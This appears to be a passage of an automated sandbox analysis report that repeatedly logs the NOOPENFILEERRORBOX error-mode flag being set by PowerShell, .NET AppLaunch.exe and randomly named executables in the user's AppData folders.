Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
